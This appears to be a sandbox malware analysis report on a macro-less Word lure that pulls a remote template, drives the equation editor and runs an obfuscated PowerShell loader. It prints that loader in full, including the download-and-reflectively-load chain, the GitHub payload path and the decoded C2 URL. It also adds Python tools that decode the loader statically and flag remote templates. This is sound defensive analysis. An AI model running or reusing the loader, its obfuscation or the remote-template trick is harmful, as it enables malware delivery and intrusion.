                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: AMG Cargo Logistic.docx Initial sample: OLE summary lastprinted = 2024-07-15 15:30:47
                  Source: AMG Cargo Logistic.docx Initial sample: OLE indicators vbamacros = False

                  Data Obfuscation

                  Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD (reported twice)
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([StrInG]$veRbosEPREfeRENCE)[1,3]+'X'-Join'') ((('{2}'+'ur'+'l'+' = {'+'1}'+'ht'+'t'+'p'+'s://'+'r'+'a'+'w.gith'+'ubusercontent.'+'c'+'om/N'+'oDetectO'+'n/'+'N'+'oDete'+'c'+'tOn/'+'r'+'efs'+'/heads/ma'+'in/'+'Deta'+'hNoth-'+'V.t'+'xt{1}; {2}base'+'64Content = (New-Ob'+'ject System'+'.'+'Net.W'+'ebClient).Do'+'wnloadStri'+'ng({2}url);'+' {2'+'}binar'+'yContent = [System.'+'Conve'+'rt]::Fr'+'omBa'+'se64S'+'t'+'ring({2}base64Conte'+'nt); {2}assembly = '+'[Refle'+'ctio'+'n.Assembly]::L'+'oad({2'+'}bi'+'na'+'r'+'yC'+'onte'+'nt); ['+'dnl'+'ib.'+'IO.'+'Hom'+'e]::'+'V'+'AI'+'('+'{0}tx'+'t.C'+'FDR'+'RW/'+'08/771.6'+'9.431.19//:pt'+'th{0}, {0}desativ'+'ado{'+'0}'+', {0}desa'+'tivado{'+'0},'+' {0}desativ'+'ado{0'+'}, {0}'+'RegAs'+'m{0}'+', {'+'0'+'}'+'{'+'0},{0}{0'+'})') -f [ChAr]34,[ChAr]39,[ChAr]36))" (reported four times)
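                  The command line above hides its intent behind two PowerShell idioms: the cmdlet name is never written (indexing the default value of $VerbosePreference, "SilentlyContinue", at positions 1 and 3 gives "ie", and the appended "X" makes "ieX", which the `.` call operator runs as Invoke-Expression), and the script body is a string sum passed through the -f format operator with [Char]34, [Char]39 and [Char]36 standing in for the double quote, single quote and dollar sign so that no variable or URL is visible to a string scanner. The following Python is an added example written for this page, not part of the Joe Sandbox report, that performs the same substitutions statically so an analyst never has to execute the stage. The sample input is the -command argument copied from the evidence above; the function names, the PREFERENCE_DEFAULTS table (standard PowerShell defaults, assumed unchanged on the victim) and the reversed-string heuristic are this example's own. The second URL it reports, http://91.134.96.177/80/WRRDFC.txt, is not stated in the report; it is what the literal "txt.CFDRRW/08/771.69.431.19//:ptth" in the VAI() call reads once reversed.

```python
import re

# Constructed sample: the -command payload from the "Obfuscated command line
# found" evidence above, copied verbatim (outer double quotes removed).
OBFUSCATED = (
    ".( ([StrInG]$veRbosEPREfeRENCE)[1,3]+'X'-Join'') "
    "((('{2}'+'ur'+'l'+' = {'+'1}'+'ht'+'t'+'p'+'s://'+'r'+'a'+'w.gith'+'ubusercontent.'+'c'+'om/N'"
    "+'oDetectO'+'n/'+'N'+'oDete'+'c'+'tOn/'+'r'+'efs'+'/heads/ma'+'in/'+'Deta'+'hNoth-'+'V.t'"
    "+'xt{1}; {2}base'+'64Content = (New-Ob'+'ject System'+'.'+'Net.W'+'ebClient).Do'+'wnloadStri'"
    "+'ng({2}url);'+' {2'+'}binar'+'yContent = [System.'+'Conve'+'rt]::Fr'+'omBa'+'se64S'+'t'"
    "+'ring({2}base64Conte'+'nt); {2}assembly = '+'[Refle'+'ctio'+'n.Assembly]::L'+'oad({2'+'}bi'"
    "+'na'+'r'+'yC'+'onte'+'nt); ['+'dnl'+'ib.'+'IO.'+'Hom'+'e]::'+'V'+'AI'+'('+'{0}tx'+'t.C'+'FDR'"
    "+'RW/'+'08/771.6'+'9.431.19//:pt'+'th{0}, {0}desativ'+'ado{'+'0}'+', {0}desa'+'tivado{'+'0},'"
    "+' {0}desativ'+'ado{0'+'}, {0}'+'RegAs'+'m{0}'+', {'+'0'+'}'+'{'+'0},{0}{0'+'})') "
    "-f [ChAr]34,[ChAr]39,[ChAr]36))"
)

# Default values of the PowerShell preference variables the idiom indexes into
# (assumed defaults; a hardened profile could change them, which is exactly
# why the loader derives the cmdlet name at run time instead of spelling it).
PREFERENCE_DEFAULTS = {
    "verbosepreference": "SilentlyContinue",
    "debugpreference": "SilentlyContinue",
    "informationpreference": "SilentlyContinue",
    "warningpreference": "Continue",
    "progresspreference": "Continue",
    "erroractionpreference": "Continue",
}

URL_RE = re.compile(r"https?://[^\s'\"()]+")


def resolve_invoke_alias(cmd):
    """Resolve `.( ([String]$VerbosePreference)[1,3]+'X' -Join '' )`.

    'SilentlyContinue'[1] and [3] are 'i' and 'e'; appending 'X' gives
    'ieX', so the `.` call operator ends up running Invoke-Expression.
    """
    m = re.search(r"\[str(?:ing)?\]\$(\w+)\)\[([\d,]+)\]\+'([^']*)'", cmd, re.I)
    if not m:
        raise ValueError("preference-variable invoke idiom not found")
    value = PREFERENCE_DEFAULTS[m.group(1).lower()]
    picked = "".join(value[int(i)] for i in m.group(2).split(","))
    return picked + m.group(3)


def resolve_format_string(cmd):
    """Join the '..'+'..' fragments and apply the -f operator statically.

    The template is the parenthesised string sum before `-f`; the arguments
    are [Char]N literals, here 34/39/36 = double quote, single quote, dollar.
    """
    fm = re.search(r"\)\s*-f\s*((?:\[char\]\d+\s*,?\s*)+)", cmd, re.I)
    if not fm:
        raise ValueError("-f clause not found")
    template_src = cmd[cmd.index("(((") + 3:fm.start()]
    template = "".join(re.findall(r"'([^']*)'", template_src))
    args = [chr(int(n)) for n in re.findall(r"\d+", fm.group(1))]
    return re.sub(r"\{(\d+)\}", lambda m: args[int(m.group(1))], template)


def extract_urls(script):
    """Collect URLs, including ones stored reversed (the VAI() C2 argument
    reads 'txt.CFDRRW/...//:ptth' until it is flipped)."""
    found = URL_RE.findall(script)
    for literal in re.findall(r"[\"']([^\"']+)[\"']", script):
        found += URL_RE.findall(literal[::-1])
    return list(dict.fromkeys(found))  # de-duplicate, keep order


def decode_stage(cmd):
    """Full static decode of one obfuscated -command argument."""
    script = resolve_format_string(cmd)
    return {
        "invoked_via": resolve_invoke_alias(cmd),
        "script": script,
        "urls": extract_urls(script),
    }


if __name__ == "__main__":
    for key, value in decode_stage(OBFUSCATED).items():
        print("%s: %s" % (key, value))
```

                  The decoded body downloads a base64 text from raw.githubusercontent.com, turns it into a .NET assembly with [Reflection.Assembly]::Load and calls [dnlib.IO.Home]::VAI with the reversed C2 URL, three "desativado" (Portuguese for "disabled") switches and the literal "RegAsm", which matches the RegAsm.exe process that the report's later code-function evidence belongs to. Nothing here touches the network or the interpreter, so the same decoder can be run over the Sigma "Base64 Encoded PowerShell Command Detected" hits in a SIEM before anyone decides whether to detonate.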
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 13_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 13_2_0041CBE1
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 8_2_00658F37 push eax; retf 8_2_00658F61
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 8_2_0065C333 push A00065C4h; ret 8_2_0065C3F5
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 8_2_0065C3E0 push A00065C4h; ret 8_2_0065C3F5
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 8_2_0065C28C pushad ; retn 0065h 8_2_0065C28D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 13_2_00457186 push ecx; ret 13_2_00457199
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 13_2_0045E55D push esi; ret 13_2_0045E566
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 13_2_00457AA8 push eax; ret 13_2_00457AC6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 13_2_00434EB6 push ecx; ret 13_2_00434EC9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 13_2_10002806 push ecx; ret 13_2_10002819
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 16_2_0044693D push ecx; ret 16_2_0044694D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 16_2_0044DB70 push eax; ret 16_2_0044DB84
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 16_2_0044DB70 push eax; ret 16_2_0044DBAC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 16_2_00451D54 push eax; ret 16_2_00451D61
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 17_2_0044B090 push eax; ret 17_2_0044B0A4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 17_2_0044B090 push eax; ret 17_2_0044B0CC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 17_2_00451D34 push eax; ret 17_2_00451D41
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 17_2_00444E71 push ecx; ret 17_2_00444E81
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 18_2_00414060 push eax; ret 18_2_00414074
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 18_2_00414060 push eax; ret 18_2_0041409C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 18_2_00414039 push ecx; ret 18_2_00414049
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 18_2_004164EB push 0000006Ah; retf 18_2_004165C4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 18_2_00416553 push 0000006Ah; retf 18_2_004165C4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 18_2_00416555 push 0000006Ah; retf 18_2_004165C4

                  Persistence and Installation Behavior

                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: \Device\RdpDr\;:1\og1.in@SSL\DavWWWRoot (reported twice)
                  Source: settings.xml.rels Extracted files from sample: https://og1.in/s7uyq0
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File dump: seethedomaindskilltechnologywhichcreatednicepersonentirelifetogetbmebackwithnewthingswithichhonestthingsalwayswantobe______seiscutebabygirlever[1].doc.0.dr
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File dump: A16B3B5D.doc.0.dr
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Section loaded: netapi32.dll and davhlpr.dll loaded
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 13_2_00406EEB ShellExecuteW,URLDownloadToFileW, 13_2_00406EEB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 13_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 13_2_0041AADB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 13_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 13_2_0041CBE1
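                  The settings.xml.rels entry and the WINWORD.EXE file-open path belong together: a .docx with no macros (the OLE indicator above says vbamacros = False) can still carry an attachedTemplate relationship whose TargetMode is External, and Word fetches that target as soon as the document opens. The `\Device\RdpDr\;:1\og1.in@SSL\DavWWWRoot` path is the WebDAV mini-redirector's UNC form of the HTTPS host (host@SSL means port 443), which is why davhlpr.dll and netapi32.dll appear in the loaded-section evidence and why the fetched second stage then lands as an RTF in the Office cache. The Python below is an added triage check written for this page, not part of the Joe Sandbox report: it opens a .docx as the ZIP package it is, reads the relationship parts Word resolves on open and flags a remote attachedTemplate. The two .rels bodies are constructed for the example; only the https://og1.in/s7uyq0 target comes from the report, and the benign file:/// Normal.dotm case is included because local templates are also written with TargetMode="External", so keying on that attribute alone would false-positive on ordinary documents.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

PKG_REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"

# Relationship parts Word resolves while opening a document. An External
# target in these is fetched before the user has interacted with anything.
RELS_OF_INTEREST = (
    "word/_rels/settings.xml.rels",   # attachedTemplate (remote template)
    "word/_rels/document.xml.rels",   # oleObject, hyperlink, image targets
)
# Schemes that reach another host; file:/// templates are External too but
# point at the local profile, which is what a benign Normal.dotm looks like.
REMOTE_SCHEMES = ("http://", "https://", "\\\\")


def external_relationships(docx_bytes):
    """Return (rels_part, short_type, target) for each External relationship."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        names = set(z.namelist())
        for part in RELS_OF_INTEREST:
            if part not in names:
                continue
            root = ET.fromstring(z.read(part))
            for rel in root.iter("{%s}Relationship" % PKG_REL_NS):
                if rel.get("TargetMode", "Internal").lower() != "external":
                    continue
                short_type = rel.get("Type", "").replace(OFFICE_REL, "")
                hits.append((part, short_type, rel.get("Target", "")))
    return hits


def loads_remote_template(docx_bytes):
    """True when settings.xml.rels binds attachedTemplate to a remote host."""
    return any(
        part.endswith("settings.xml.rels")
        and rtype == "attachedTemplate"
        and target.lower().startswith(REMOTE_SCHEMES)
        for part, rtype, target in external_relationships(docx_bytes)
    )


# Constructed settings.xml.rels bodies. Only the https://og1.in/s7uyq0 target
# is taken from the report; the XML around it is written for this example.
MALICIOUS_RELS = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    '<Relationships xmlns="%s"><Relationship Id="rId1" Type="%sattachedTemplate" '
    'Target="https://og1.in/s7uyq0" TargetMode="External"/></Relationships>'
) % (PKG_REL_NS, OFFICE_REL)

BENIGN_RELS = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    '<Relationships xmlns="%s"><Relationship Id="rId1" Type="%sattachedTemplate" '
    'Target="file:///C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm" '
    'TargetMode="External"/></Relationships>'
) % (PKG_REL_NS, OFFICE_REL)


def build_docx(settings_rels_xml):
    """Minimal constructed .docx holding only the parts the check inspects."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("word/settings.xml",
                   '<w:settings xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" '
                   'xmlns:r="%s"><w:attachedTemplate r:id="rId1"/></w:settings>' % OFFICE_REL[:-1])
        z.writestr("word/_rels/settings.xml.rels", settings_rels_xml)
    return buf.getvalue()


if __name__ == "__main__":
    for label, rels in (("constructed malicious", MALICIOUS_RELS), ("constructed benign", BENIGN_RELS)):
        blob = build_docx(rels)
        print(label, external_relationships(blob), "remote template:", loads_remote_template(blob))
```

                  Run against a real sample, `external_relationships(open(path, "rb").read())` lists every outbound target without rendering the document, which is the check to put at the mail gateway or in a triage script; the report's own chain (remote template over WebDAV, then an RTF that drives EQNEDT32.EXE) never needs a macro, so "vbamacros = False" is not a reason to trust the file.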
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX (67 occurrences)
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX (6 occurrences)
                  Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX (5 occurrences)
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (71 occurrences)
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 13_2_0040F7E2 Sleep,ExitProcess, 13_2_0040F7E2
